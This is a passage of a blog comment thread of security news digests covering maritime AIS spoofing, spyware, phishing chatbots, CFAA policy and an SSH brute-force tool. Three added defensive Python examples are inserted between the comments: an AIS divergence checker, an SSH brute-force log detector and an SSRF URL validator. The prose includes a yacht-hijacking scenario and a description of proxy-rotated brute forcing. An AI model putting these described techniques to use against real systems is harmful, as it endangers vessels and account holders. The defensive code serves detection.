    “Being able to get access to the systems on board the yacht,” he explained, “and to know what the plan is (that is, the charted route), and maybe even to monitor comms to know who’s on board; and then to use a hack on the charting system, you could misdirect the yacht so it thinks it is staying nicely clear in international waters, but you bring it within fast boat range of the Somali coast. At the same time, alter the AIS transponder system so that the vessel is reporting itself as being somewhere, let’s say north, of where it is supposed to be while it has gone way south. Fast gunboats can come out and take the crew hostage. The yacht may have broadcast an emergency alert, and an interdiction ship may have been dispatched – but it will go to where the AIS is reporting the location. So, there’s a mismatch between actual and reported location, which reduces the risk for kidnappers.”

    The maritime sector is already in the crosshairs of the ransomware gangs. “We have certainly seen ransomware affect maritime shipping,” John Bambenek, principal threat hunter at Netenrich, told SecurityWeek. “The entire ecosystem is supported by IT systems. When they are compromised, ships may have to wait in port for it to be sorted out, or goods cannot be shipped outbound to their customers. The net effects will look much like supply chain disruptions we have seen over the last year.”

    Jasmine Henry, field security director at JupiterOne, agrees that the port itself is a vulnerable part of the maritime ecosphere. “The reason is simple,” she said. “The majority have limited visibility into ICS systems to even understand which devices exist, let alone apply proper updates or configurations. Merchant vessels and ports are extraordinarily vulnerable to increasingly sophisticated ransomware attacks against unmanaged OT systems, as well as DDoS attacks, command injection, sideloaded malware, and exploited misconfigurations.”

    The cyber reality

    “One of the weird things about my job,” said Professor Jones, “is that I get to look at all the truly horrible things you can do by taking control of a ship. But I try not to be too melodramatic, because there are too many over-hyped horror stories in cybersecurity. While I don’t want small freight companies to go out of business because they cannot afford hundreds of thousands of pounds to update their ships, there is certainly the possibility of both criminal extortion and nation state geopolitical activity using vessels. With some vessels, it would be very hard to mitigate against an attack – sometimes, the crew will have less than a minute to respond – so an attacker with sufficient skill and determination has a high probability of success.”

    What is missing from the maritime sector is the ability to do genuine and regular risk assessments. The risk is different for each vessel, and varies depending on the route, cargo, and external threat conditions.

    The bottom line today, however, is that the global economy’s single biggest supply chain is vulnerable to cyberattack.

    Reply
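The two AIS failure modes above (a transmitter reporting a false position, or no position at all) are both detectable when the self-report is cross-checked against a source the attacker does not control, such as the vessel's own GNSS receiver or a shore radar track. The following is an added example and not code from the article or from any of the people quoted in it: it computes the great-circle distance between the AIS-reported position and an independent fix and raises an alert on divergence or on silence. The Earth-radius constant, the thresholds and the coordinates are constructed assumptions.

```python
import math
from dataclasses import dataclass
from typing import List, Optional

EARTH_RADIUS_NM = 3440.065  # mean Earth radius in nautical miles (assumed constant)


@dataclass
class Fix:
    """A position report: latitude/longitude in decimal degrees, time in seconds."""
    lat: float
    lon: float
    t: float


def haversine_nm(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points, in nautical miles."""
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_NM * math.asin(math.sqrt(a))


def check_ais(reported: Optional[Fix], independent: Fix, now: float,
              max_divergence_nm: float = 1.0, max_silence_s: float = 600.0) -> List[str]:
    """Compare the last AIS self-report with an independent fix.

    Returns a list of alert codes (empty when the two sources agree):
      AIS_SILENT      - no report at all, or the last one is older than
                        max_silence_s (the 'invisible ghost ship' case)
      AIS_DIVERGENCE  - the reported position is further than max_divergence_nm
                        from the independent fix (the 'reported elsewhere' case)
    The thresholds are constructed values; real ones depend on the vessel's
    speed and on how often AIS reports are expected.
    """
    alerts: List[str] = []
    if reported is None or now - reported.t > max_silence_s:
        alerts.append("AIS_SILENT")
        return alerts
    dist = haversine_nm(reported.lat, reported.lon, independent.lat, independent.lon)
    if dist > max_divergence_nm:
        alerts.append(f"AIS_DIVERGENCE:{dist:.1f}nm")
    return alerts


if __name__ == "__main__":
    # Constructed sample: the vessel's own GNSS fix versus what AIS is broadcasting.
    own_fix = Fix(lat=10.000, lon=55.000, t=1000.0)
    honest = Fix(lat=10.002, lon=55.001, t=995.0)   # a few hundred metres off: normal
    spoofed = Fix(lat=10.500, lon=55.000, t=995.0)  # about 30 nm north of the true position
    print(check_ais(honest, own_fix, now=1000.0))   # []
    print(check_ais(spoofed, own_fix, now=1000.0))  # ['AIS_DIVERGENCE:30.0nm']
    print(check_ais(None, own_fix, now=1000.0))     # ['AIS_SILENT']
```

The useful property is that the check needs no knowledge of how the AIS unit was tampered with; it only needs a second position source that is not reachable from the compromised system, which is why the independent fix should come from a physically separate receiver or from shore-side tracking rather than from the same bridge network.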
  2. Tomi Engdahl says:

    National Cybersecurity Agencies Describe Commonly Used Initial Access Techniques
    https://www.securityweek.com/national-cybersecurity-agencies-describe-commonly-used-initial-access-techniques

    Cybersecurity agencies in the United States, the United Kingdom, Canada, the Netherlands, and New Zealand warn that threat actors exploit poor security practices for initial access to victim environments.

    Common techniques employed by adversaries looking to compromise a target system include exploitation of public-facing applications or external remote services, phishing, the use of valid credentials, and exploitation of trusted relationships.

    Authorities in the five concerned countries have identified a series of weaknesses that malicious actors typically look to exploit in their attacks, which include improper security controls, weak configurations, and overall poor cybersecurity practices.

    Environments susceptible to exploitation, they say, lack mandatory multi-factor authentication, have incorrectly applied privileges or permissions, use default configurations or default credentials, or run on software that is not kept up to date.

    Unprotected remote access services, weak password policies, unprotected cloud services, open ports, and misconfigured services can also be targeted in malicious attacks.

    Failure to detect phishing attempts and the lack of strong endpoint detection and response are also known causes of intrusion, the five nations say.

    To ensure they are protected, organizations are advised to implement a zero-trust security model, to limit the remote login of local administrators, control user access to resources, implement proper conditional access policies, and make sure that no system has open RDP ports.

    Reply
  3. Tomi Engdahl says:

    NVIDIA Patches Code Execution Vulnerabilities in Graphics Driver
    https://www.securityweek.com/nvidia-patches-code-execution-vulnerabilities-graphics-driver
    NVIDIA has announced the roll-out of updates for its graphics drivers to address multiple vulnerabilities, including four CVEs rated “high severity.”
    The most severe of these issues are CVE‑2022‑28181 and CVE‑2022‑28182 (CVSS score of 8.5), which could lead to “code execution, denial of service, escalation of privileges, information disclosure, and data tampering,” NVIDIA says.
    Both security holes could be exploited by an “unauthorized attacker on the network” to cause “an out-of-bounds write through a specially crafted shader.”
    While CVE‑2022‑28181 impacts both the Windows and Linux versions of NVIDIA’s GPU display drivers, CVE‑2022‑28182 exists in the Windows DirectX11 user mode driver, the company says.
    The vulnerabilities were reported by Cisco Talos’ security researchers, who say that CVE‑2022‑28182 in fact describes three memory corruption issues identified in NVIDIA D3D10 Driver version 496.76, 30.0.14.9676.
    “An attacker could exploit these vulnerabilities by sending the target a specially crafted executable or shader file. These issues could also allow an adversary to perform a guest-to-host escape if they target a guest machine running virtualization environments,” the researchers note.
    Tracked as CVE‑2022‑28183 (CVSS score of 7.7) and CVE‑2022‑28184 (CVSS score of 7.1), the other two high-severity vulnerabilities resolved with NVIDIA’s May 2022 set of patches impact both Windows and Linux drivers.

    Reply
  4. Tomi Engdahl says:

    DOJ Announces It Won’t Prosecute White Hat Security Researchers https://www.vice.com/en/article/v7d9nb/department-of-justice-security-researchers-new-cfaa-policy
    On Thursday the Department of Justice announced a policy shift in that it will no longer prosecute good-faith security research that would have violated the country’s federal hacking law the Computer Fraud and Abuse Act (CFAA).

    Reply
  5. Tomi Engdahl says:

    The passwords most used by CEOs are startlingly dumb https://www.pcgamer.com/the-passwords-most-used-by-ceos-are-startlingly-dumb/
    A recent cybersecurity report shows how immensely idiotic many CEOs and business owners can be, considering the strength of their chosen account passwords. Imagine entrusting the livelihood of hundreds, even thousands of employees to someone who uses ‘123456’ or ‘qwerty’ as a password.

    Reply
  6. Tomi Engdahl says:

    NSA Swears On The Body Of Ed Snowden It Will Not Backdoor New Encryption Standard https://www.techdirt.com/2022/05/16/nsa-swears-on-the-body-of-ed-snowden-it-will-not-backdoor-new-encryption-standard/
    The NSA which has undermined encryption standards in the past says it won’t undermine the next strain of encryption, one being built to withstand the inevitable arrival of quantum computing. Also:
    https://www.bloomberg.com/news/articles/2022-05-13/nsa-says-no-backdoor-in-new-encryption-scheme-for-us-tech

    Reply
  7. Tomi Engdahl says:

    Humans cannot defend themselves against AI
    https://etn.fi/index.php/13-news/13609-ihminen-ei-voi-suojautua-tekoaelyae-vastaan

    Rik Ferguson is research director at security company Trend Micro. During the pandemic, the Project 2030 report was drawn up under his leadership, predicting where security and cybercrime are heading. AI and machine learning will also come into wide use by cybercriminals, and that is in no way good news.

    - When we have code that can code, the pace of technological development accelerates. When AI builds new products, it operates at machine speed and is no longer limited to the human way of thinking.

    This is a big problem for cyber defenders. – We are used to a human adversary, and legislation too is aimed at human criminals. When the adversary is a machine and thinks the way an AI does, everything we have learned about defending may lose its meaning, Ferguson sees.

    - In the same way, AI is not limited by human logic or by the progression of human thought. This is going to be a huge challenge. How can this be defended against? How can it be regulated?

    According to Ferguson, it will ultimately end up with AI fighting AI. – If you defend against something that thinks differently or operates in a different thought space, the only way to respond is to iterate through all possible thoughts. You have to respond with brute force. Humans cannot do this fast enough.

    Reply
  8. Tomi Engdahl says:

    QuSecure Launches Quantum-Resilient Encryption Platform
    https://www.securityweek.com/qusecure-lauches-quantum-resilient-encryption-platform

    New firm launches to provide the Easy Button for implementing quantum secure encryption

    The pressure to implement quantum secure encryption is increasing. This isn’t because functioning quantum computers able to crack asymmetric encryption are expected tomorrow, but because of the growing belief they could become available in five or ten years’ time.

    Communications are being stolen by adversaries today, containing secrets with a shelf-life of decades, under the ‘harvest now, decrypt later’ principle. These communications need to be protected against future quantum decryption now.

    On April 18, 2022, Khanna, Connolly and Mace introduced the bipartisan Quantum Computing Cybersecurity Preparedness Act. The introduction states, “To protect our country’s data, critical government systems must be secured with algorithms and encryption so difficult to crack that even a future quantum computer won’t be able to break the code. This can be done through post-quantum cryptography.”

    On May 4, 2022, the White House issued a memorandum with the dual purpose of promoting quantum research and development, and implementing quantum-proof encryption. Talking about ‘a cryptanalytically relevant quantum computer (CRQC)’, it warns, “When it becomes available, a CRQC could jeopardize civilian and military communications, undermine supervisory and control systems for critical infrastructure, and defeat security protocols for most Internet-based financial transactions.”

    Reply
  9. Tomi Engdahl says:

    Phishers Add Chatbot to the Phishing Lure
    https://www.securityweek.com/phishers-add-chatbot-phishing-lure

    Researchers have discovered a new approach being taken by phishers to increase victim engagement and confidence: the addition of an interactive chatbot. We have all become accustomed to the chatbots used by many of the largest service providers – they are annoying, but something we must navigate.

    The phishers hope that this reluctant acceptance of chatbots will help lower the attention of the target victim. The process is described in a new blog post.

    Interactive Phishing: Using Chatbot-like Web Applications to Harvest Information
    https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/interactive-phishing-using-chatbot-like-web-applications-to-harvest-information/

    Phishing website links are commonly delivered via email to their respective targets. Once clicked, these websites often show a single webpage that outright asks for sensitive information like account login credentials, credit card details, and other personally identifiable information (PII).

    Recently, we have encountered an interesting phishing website containing an interactive component in it: a chatbot. Unlike a lot of phishing websites, this one establishes a conversation first, and bit-by-bit guides the victim to the actual phishing pages.

    Although the phishing method is quite unique, it still uses email as the delivery channel. A deeper inspection of the email header shows that the “From” header is missing the email address component, which is a red flag already.

    To gain even more confidence and trust from the target, a CAPTCHA is presented right after the victim clicks the “Schedule delivery” button. However, something is odd here – nothing else is clickable except for the confirm and close button.

    Reply
  10. Tomi Engdahl says:

    Joseph Cox / VICE:
    In a policy shift, the US Department of Justice plans to stop prosecuting good-faith security research that would have violated the Computer Fraud and Abuse Act — The new policy addresses decades of uncertainty around the law and security research. — Joseph Cox

    DOJ Announces It Won’t Prosecute White Hat Security Researchers
    The new policy addresses decades of uncertainty around the law and security research.
    https://www.vice.com/en/article/v7d9nb/department-of-justice-security-researchers-new-cfaa-policy

    On Thursday the Department of Justice announced a policy shift in that it will no longer prosecute good-faith security research that would have violated the country’s federal hacking law the Computer Fraud and Abuse Act (CFAA).

    The move is significant in that the CFAA has often posed a threat to security researchers who may probe or hack systems in an effort to identify vulnerabilities so they can be fixed. The revision of the policy means that such research should not face charges.

    “Computer security research is a key driver of improved cybersecurity,” Deputy Attorney General Lisa O. Monaco said in a statement published with the announcement. “The department has never been interested in prosecuting good-faith computer security research as a crime, and today’s announcement promotes cybersecurity by providing clarity for good-faith security researchers who root out vulnerabilities for the common good.”

    For decades experts have criticized the broad nature of the CFAA. The Electronic Frontier Foundation, an activist organization, previously said that “Security research is important to keep all computer users safe. If we do not know about security vulnerabilities, we cannot fix them, and we cannot make better computer systems in the future. The CFAA should protect white-hat hackers and give them incentives to continue their important work.”

    Andrew Crocker, a senior staff attorney on the EFF’s civil liberties team told Motherboard in a statement “We’re pleased to see the Department of Justice recognize the contribution that security research plays in strengthening the security of the entire Internet, everything from messaging and social media applications to financial systems to critical infrastructure. Too often, the specter of the CFAA—with its ill-defined focus on ‘unauthorized access’—deters researchers from discovering and disclosing vulnerabilities in these systems.”

    He said that the new policy does not go far enough. “By exempting research conducted ‘solely’ in ‘good faith,’ the policy calls into question work that serves both security goals and other motives, such as a researcher’s desire to be compensated or recognized for their contribution. As an agency policy, it does not bind courts and can be rescinded at any time such as by a future administration. And it does nothing to lessen the risk of frivolous or overbroad CFAA civil litigation against security researchers, journalists, and innovators. The policy is a good start, but it is no substitute for comprehensive CFAA reform.”

    The announcement provided an example of the sort of ‘research’ that would be considered bad faith and could still face charges. “Discovering vulnerabilities in devices in order to extort their owners, even if claimed as ‘research,’ is not in good faith,” it reads.

    The new policy comes into effect immediately and all federal prosecutors who wish to charge cases under the CFAA are required to follow the policy, the announcement adds.

    Reply
  11. Tomi Engdahl says:

    Wall Street Journal:
    Analysis: insurers significantly raised cyber coverage premiums in 2021, after high profile hacks; direct-written premiums by the largest insurers rose 92% YoY

    Cyber Insurers Raise Rates Amid a Surge in Costly Hacks
    Insurance market resets after a ransomware boom and the threat of spillover from Ukraine
    https://www.wsj.com/articles/cyber-insurers-raise-rates-amid-a-surge-in-costly-hacks-11652866200?mod=djemalertNEWS

    Reply
  12. Tomi Engdahl says:

    Orbitaldump – a simple multi-threaded distributed SSH brute-forcing tool written in Python
    https://hakin9.org/orbitaldump-a-simple-multi-threaded-distributed-ssh-brute-forcing-tool-written-in-python/

    How it Works
    When the script is executed without the --proxies switch, it acts just like any other multi-threaded SSH brute-forcing script. When the --proxies switch is added, the script pulls a list (usually thousands) of SOCKS4 proxies from ProxyScrape and launches all brute-force attacks over the SOCKS4 proxies, so brute-force attempts will be less likely to be rate-limited by the target host.

    Reply
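The point of spreading attempts over thousands of proxies is that per-source-IP rate limiting and per-IP failure counting no longer see anything unusual. The defensive counterpart is to count failures per target account across distinct source addresses as well as per IP. The following is an added example, not code from the tool or from the article: it parses a few constructed sshd log lines in the usual auth.log format, flags noisy single sources, flags accounts being hammered from many sources, and flags a successful login into an account that was under such pressure. Thresholds, hostnames, usernames and addresses are constructed.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Matches the two sshd log lines that matter here (other lines are ignored).
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

# Constructed sample log: one loud source, one distributed campaign, one benign login.
SAMPLE_LOG: List[str] = (
    [f"May 20 10:01:0{i} gw sshd[12{i:02d}]: Failed password for invalid user admin "
     f"from 198.51.100.7 port 5123{i} ssh2" for i in range(6)]
    + [f"May 20 10:01:1{i} gw sshd[13{i:02d}]: Failed password for root "
       f"from 203.0.113.{i + 1} port 4000{i} ssh2" for i in range(6)]
    + ["May 20 10:01:20 gw sshd[1400]: Connection closed by 203.0.113.6 port 40005 [preauth]",
       "May 20 10:01:21 gw sshd[1401]: Accepted password for root from 203.0.113.7 port 40007 ssh2",
       "May 20 10:05:00 gw sshd[1402]: Accepted password for alice from 192.0.2.10 port 50000 ssh2"]
)


def parse(lines: List[str]) -> List[Dict[str, str]]:
    """Extract timestamp, result, user and source IP from matching lines."""
    return [m.groupdict() for m in map(LOG_RE.match, lines) if m]


def analyze(lines: List[str], per_ip_threshold: int = 5, distinct_ip_threshold: int = 5) -> dict:
    """Two independent views of the same failures:
    - per source IP (catches a single loud host)
    - per target account, counting distinct sources (catches proxy-distributed attempts,
      which per-IP counting alone would miss)
    A success is flagged when either view was already suspicious for that login.
    """
    fails_per_ip: Dict[str, int] = defaultdict(int)
    ips_per_user: Dict[str, set] = defaultdict(set)
    suspicious_logins = []
    for ev in parse(lines):
        if ev["result"] == "Failed":
            fails_per_ip[ev["ip"]] += 1
            ips_per_user[ev["user"]].add(ev["ip"])
        elif (len(ips_per_user[ev["user"]]) >= distinct_ip_threshold
              or fails_per_ip[ev["ip"]] >= per_ip_threshold):
            suspicious_logins.append((ev["user"], ev["ip"], ev["ts"]))
    return {
        "noisy_ips": {ip for ip, n in fails_per_ip.items() if n >= per_ip_threshold},
        "sprayed_users": {u for u, ips in ips_per_user.items() if len(ips) >= distinct_ip_threshold},
        "suspicious_logins": suspicious_logins,
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

The per-account view is the one that survives proxy rotation; in production it should be keyed on a time window as well, and a successful login that follows a distributed burst deserves a higher severity than either counter alone.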
  13. Tomi Engdahl says:

    Some top 100,000 websites collect everything you type—before you hit submit
    A number of websites include keyloggers that covertly snag your keyboard inputs.
    https://www.wired.com/story/leaky-forms-keyloggers-meta-tiktok-pixel-study/

    Reply
  14. Tomi Engdahl says:

    Lily Hay Newman / Wired:
    Google details three campaigns that used Predator spyware, developed by North Macedonian company Cytrox and exploited five Android vulnerabilities found in 2021 — New research from Google’s Threat Analysis Group outlines the risks Android users face from the surveillance-for-hire industry.

    Spyware Vendors Target Android With Zero-Day Exploits
    https://www.wired.com/story/android-spyware-cytrox-predator-google-tag/

    New research from Google’s Threat Analysis Group outlines the risks Android users face from the surveillance-for-hire industry.

    NSO Group and its powerful Pegasus malware have dominated the debate over commercial spyware vendors who sell their hacking tools to governments, but researchers and tech companies are increasingly sounding the alarm about activity in the wider surveillance-for-hire industry. As part of this effort, Google’s Threat Analysis Group is publishing details on Thursday of three campaigns that used the popular Predator spyware, developed by the North Macedonian firm Cytrox, to target Android users.

    In line with findings on Cytrox published in December by researchers at University of Toronto’s Citizen Lab, TAG saw evidence that state-sponsored actors who bought the Android exploits were located in Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain, and Indonesia. And there may have been other customers. The hacking tools took advantage of five previously unknown Android vulnerabilities, as well as known flaws that had fixes available but that victims hadn’t patched.

    “It’s important to shine some light on the surveillance vendor ecosystem and how these exploits are being sold,” says Google TAG director Shane Huntley. “We want to reduce the ability of both the vendors and the governments and other actors who buy their products to throw around these dangerous zero-days without any cost. If there’s no regulation and no downside to using these capabilities, then you’ll see it more and more.”

    TAG says it currently tracks more than 30 surveillance-for-hire vendors that have ranging levels of public presence and offer an array of exploits and surveillance tools. In the three Predator campaigns TAG examined, attackers sent Android users one-time links over email that looked like they had been shortened with a standard URL shortener. The attacks were targeted, focusing on just a few dozen potential victims. If a target clicked on the malicious link, it took them to a malicious page that automatically began deploying the exploits before quickly redirecting them to a legitimate website. On that malicious page, attackers deployed “Alien,” Android malware designed to load Cytrox’s full spyware tool, Predator.

    As is the case with iOS, such attacks on Android require exploiting a series of operating system vulnerabilities in sequence. By deploying fixes, operating system makers can break these attack chains, sending spyware vendors back to the drawing board to develop new or modified exploits.

    Reply
  15. Tomi Engdahl says:

    A frighteningly genuine online scam empties wallets: did you accidentally chat with a criminal?
    https://www.tivi.fi/uutiset/tv/6dedaa5b-1093-4049-b3f5-390ca8376c0c
    The skilfully executed phishing uses two-step verification and genuine-looking confirmations. The new kind of phishing attacks use automated chatbots that guide unsuspecting users into handing their information over to cybercriminals. The use of bots gives the victim the impression that the situation is genuine, since similar customer-service bots are found on many well-known websites.

    Phishing websites now use chatbots to steal your credentials
    https://www.bleepingcomputer.com/news/security/phishing-websites-now-use-chatbots-to-steal-your-credentials/

    Phishing attacks are now using automated chatbots to guide visitors through the process of handing over their login credentials to threat actors.

    This approach automates the process for attackers and gives a sense of legitimacy to visitors of the malicious sites, as chatbots are commonly found on websites for legitimate brands.

    This new development in phishing attacks was discovered by researchers at Trustwave, who shared the report with Bleeping Computer before publication.

    Reply
  16. Tomi Engdahl says:

    Deepfake attacks can easily trick live facial recognition systems online https://www.theregister.com/2022/05/22/ai_in_brief/
    Miscreants can easily steal someone else’s identity by tricking live facial recognition software using deepfakes, according to a new report. So-called “liveness tests” try to authenticate identities in real-time, relying on images or video streams from cameras like face recognition used to unlock mobile phones, for example. Nine out of ten vendors failed Sensity’s live deepfake attacks.

    Reply
  17. Tomi Engdahl says:

    Clearview AI illegally harvested data to create a database filled with more than 20 billion images it sells to organizations and law enforcement agencies, the U.K.’s privacy watchdog said.

    Clearview AI Fined $9.4 Million In U.K. For Illegal Facial Recognition Database
    https://www.forbes.com/sites/roberthart/2022/05/23/clearview-ai-fined-94-million-in-uk-for-illegal-facial-recognition-database/?utm_campaign=forbes&utm_source=facebook&utm_medium=social&utm_term=Gordie&sh=204288011963

    Reply
  18. Tomi Engdahl says:

    Don’t make random HTTP requests.
    https://www.youtube.com/watch?v=RCJdPiogUIk

    In this episode we’ll explore the world of SSRFs.

    If you are searching for “A New Era of SSRF – Exploiting URL Parser in Trending Programming Languages!”
    https://www.youtube.com/watch?v=voTHFdL9S2k

    Reply
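The two videos linked above deal with server-side request forgery and with URL-parser discrepancies that let a hostile URL slip past a naive check. On the defensive side, the durable mitigation is to validate the addresses a URL actually resolves to rather than the string the URL is written in. The following is an added example, not code from either video: an allow-list validator for outbound fetches that restricts scheme and port, rejects userinfo, and checks every resolved address against private, loopback, link-local and similar ranges. The resolver is injectable so the example runs offline with a constructed fake DNS table; the hostnames and addresses in that table are constructed.

```python
import ipaddress
import socket
from typing import Callable, Set, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def system_resolver(host: str) -> Set[str]:
    """Every address the OS resolver returns for host (A and AAAA records).
    Passing the name through getaddrinfo rather than matching it as text also
    normalises alternate numeric spellings, which is what parser tricks rely on."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


# Constructed fake DNS table so the example runs offline.
FAKE_DNS = {
    "api.example.com": {"93.184.216.34"},
    "internal.corp.example": {"10.0.0.5"},
    "mixed.example": {"93.184.216.34", "127.0.0.1"},  # one public, one loopback answer
}


def fake_resolver(host: str) -> Set[str]:
    if host not in FAKE_DNS:
        raise OSError(f"NXDOMAIN {host}")
    return FAKE_DNS[host]


def is_public_address(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    # IPv4-mapped IPv6 (::ffff:a.b.c.d) is judged by the embedded IPv4 address.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_outbound_url(url: str,
                          resolver: Callable[[str], Set[str]] = system_resolver) -> Tuple[bool, str]:
    """Return (allowed, reason). Only http/https on 80/443 to public addresses pass."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {scheme or '(none)'}"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port not allowed: {port}"
    try:
        addrs = {str(ipaddress.ip_address(host))}  # literal IP (v4 or bracketed v6)
    except ValueError:
        try:
            addrs = set(resolver(host))
        except OSError as exc:
            return False, f"unresolvable host: {exc}"
    for addr in addrs:
        if not is_public_address(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, ",".join(sorted(addrs))


if __name__ == "__main__":
    for candidate in ("https://api.example.com/v1/status", "http://127.0.0.1/",
                      "http://[::ffff:127.0.0.1]/", "http://internal.corp.example/",
                      "http://user@api.example.com/", "file:///etc/hosts"):
        print(candidate, "->", validate_outbound_url(candidate, resolver=fake_resolver))
```

Two caveats remain even with this check: the fetch must connect to the address that was validated (otherwise a second DNS lookup can return a different answer), and any redirect the fetch follows must be validated again as a fresh URL.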
  19. Tomi Engdahl says:

    IP and cybersecurity disputes are top legal concerns for tech companies
    https://techcrunch.com/2022/05/23/ip-and-cybersecurity-disputes-are-top-legal-concerns-for-tech-companies/?tpcc=tcplusfacebook

    No industry is a stranger to litigation, but for the tech sector, it appears intellectual property (IP) and patent disputes, followed by cybersecurity and data protection issues, are among the top legal matters that keep tech company managers up at night.

    Startup teams, legal counsel and other internal stakeholders looking to address these legal challenges should consider three key factors impacting the sector.

    IP disputes: The top litigation concern facing the sector
    Technology respondents were more likely to be concerned about IP disputes than any other potential dispute source, with 46% listing them among the most concerning, compared to 16% across all industries.

    The costs associated with these disputes, particularly when defending against accusations of patent infringement, were top of mind for respondents. Defending against IP disputes can be a drain on resources, particularly given the continued cost and prevalence of disputes initiated by “patent trolls” — entities whose primary business is to obtain and enforce patents against technology companies — far exceed the costs associated with leveraging the patent to provide goods and services.

    Many respondents reportedly are expanding their legal teams.

    Tech firms feel exposed to cybersecurity, data protection disputes

    Technology respondents listed cybersecurity and data protection issues as the top concerning dispute trend, more than any other industry — 71% reported they felt more exposed to cyber security/data protection disputes, compared to the previous 12 months. They said protecting both their own proprietary information and their customer’s information was critical, particularly in an increasingly global market.

    Reply
  20. Tomi Engdahl says:

    This is how hospitals prepare for cyberattacks: “The importance of the matter has been identified and acknowledged”
    https://www.tivi.fi/uutiset/tv/9f93d63c-3df8-4127-8649-dea135cb5af4
    Preparedness for cyber threats such as denial-of-service attacks, ransomware and network attacks is at a good level, Finland’s university hospitals assure.

    Reply
  21. Tomi Engdahl says:

    Hackers can hack your online accounts before you even register them https://www.bleepingcomputer.com/news/security/hackers-can-hack-your-online-accounts-before-you-even-register-them/
    Security researchers have revealed that hackers can hijack your online accounts before you even register them by exploiting flaws that have already been fixed on popular websites, including Instagram, LinkedIn, Zoom, WordPress, and Dropbox. Andrew Paverd, a researcher at Microsoft Security Response Center, and Avinash Sudhodanan, an independent security researcher, analyzed 75 popular online services and found that at least 35 are vulnerable to account pre-hijacking attacks. Some notable examples of vulnerable platforms are Dropbox (UEC), Instagram (TID), LinkedIn (US), WordPress.com (US and UEC), and Zoom (CFM and NV).

    Reply
  22. Tomi Engdahl says:

    How GDPR Is Failing
    https://www.wired.com/story/gdpr-2022/
    Since the General Data Protection Regulation went into effect, data regulators tasked with enforcing the law have struggled to act quickly on complaints against Big Tech firms and the murky online advertising industry, with scores of cases still outstanding. While GDPR has immeasurably improved the privacy rights of millions inside and outside of Europe, it hasn’t stamped out the worst problems: Data brokers are still stockpiling your information and selling it, and the online advertising industry remains littered with potential abuses.

    Reply
  23. Tomi Engdahl says:

    FBI Wiretap Opens Window To Murderous Drug Gang And A Crucial Flaw In Snapchat Privacy
    https://www.forbes.com/sites/thomasbrewster/2022/05/23/fbi-snapchat-surveillance-exposes-a-murderous-mexican-gang-and-snaps-weakness/?sh=712b35067aa7
    Included in a search warrant unsealed earlier this year, the Snapchat surveillance operation offers a rare insight into how police can intercept conversations over social media apps almost instantaneously rather than wait for days, weeks or months to get similar data from the relevant tech giant. Forbes recently obtained a presentation by surveillance provider PenLink, in which such near-real-time wiretaps on the likes of Snapchat, Facebook and other apps were detailed. The PenLink presenter told police attendees that Snapchat, typically, could provide police with updates on user communications up to four times a day, though in some cases it may be more frequent.

    Reply
  24. Tomi Engdahl says:

    Defending the Healthcare Security Landscape in the Age of Connected Devices
    https://www.securityweek.com/defending-healthcare-security-landscape-age-connected-devices

    Reply
  25. Tomi Engdahl says:

    Some top 100,000 websites collect everything you type—before you hit submit | Ars Technica
    https://www.wired.com/story/leaky-forms-keyloggers-meta-tiktok-pixel-study/
    A surprising number of the top 100,000 websites effectively include keyloggers that covertly snag everything you type into a form.
    When you sign up for a newsletter, make a hotel reservation, or check out online, you probably take for granted that if you mistype your email address three times or change your mind and X out of the page, it doesn’t matter. Nothing actually happens until you hit the Submit button, right? Well, maybe not. As with so many assumptions about the web, this isn’t always the case, according to new research: A surprising number of websites are collecting some or all of your data as you type it into a digital form.
    Researchers from KU Leuven, Radboud University, and University of Lausanne crawled and analyzed the top 100,000 websites, looking at scenarios in which a user is visiting a site while in the European Union and visiting a site from the United States. They found that 1,844 websites gathered an EU user’s email address without their consent, and a staggering 2,950 logged a US user’s email in some form. Many of the sites seemingly do not intend to conduct the data-logging but incorporate third-party marketing and analytics services that cause the behavior.
    After specifically crawling sites for password leaks in May 2021, the researchers also found 52 websites in which third parties, including the Russian tech giant Yandex, were incidentally collecting password data before submission. The group disclosed their findings to these sites, and all 52 instances have since been resolved.
    “If there’s a Submit button on a form, the reasonable expectation is that it does something—that it will submit your data when you click it,” says Güneş Acar, a professor and researcher in Radboud University’s digital security group and one of the leaders of the study. “We were super surprised by these results. We thought maybe we were going to find a few hundred websites where your email is collected before you submit, but this exceeded our expectations by far.”
    The researchers, who will present their findings at the Usenix security conference in August, say they were inspired to investigate what they call “leaky forms” by media reports, particularly from Gizmodo, about third parties collecting form data regardless of submission status. They point out that, at its core, the behavior is similar to so-called key loggers, which are typically malicious programs that log everything a target types.

    Reply
  26. Tomi Engdahl says:

    Facial Recognition Firm Clearview AI Fined $9.4 Million by UK Regulator
    https://www.securityweek.com/facial-recognition-firm-clearview-ai-fined-94-million-uk-regulator

    ICO orders Clearview AI to delete all UK data
